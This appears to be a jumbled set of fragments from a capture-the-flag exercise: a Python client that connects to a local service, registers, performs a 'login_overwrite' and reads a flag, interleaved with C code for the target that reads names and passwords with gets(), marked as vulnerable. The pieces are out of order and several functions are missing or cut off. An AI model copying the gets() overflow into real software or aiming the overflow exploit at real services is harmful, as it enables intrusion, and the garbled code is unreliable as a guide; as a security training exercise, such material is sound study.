def main(): s = socket.create_connection((HOST, PORT)) register(s) login_overwrite(s) get_flag(s) s.close()

void register_user(void) !pwd) puts("OOM"); exit(1);

def get_flag(s): menu(s) s.sendall(b'3\n') flag = recvuntil(s, b'\n') print(flag.decode())

typedef struct char *name; char *pwd; user_t;

def recvuntil(s, delim=b'\n'): data = b'' while not data.endswith(delim): chunk = s.recv(1) if not chunk: break data += chunk return data

HOST = "127.0.0.1" PORT = 1337 # change to the port the service is bound to

user_t users[10]; int logged_in = 0;

printf("Name: "); gets(name); // <<< vulnerable printf("Password: "); gets(pwd); // <<< vulnerable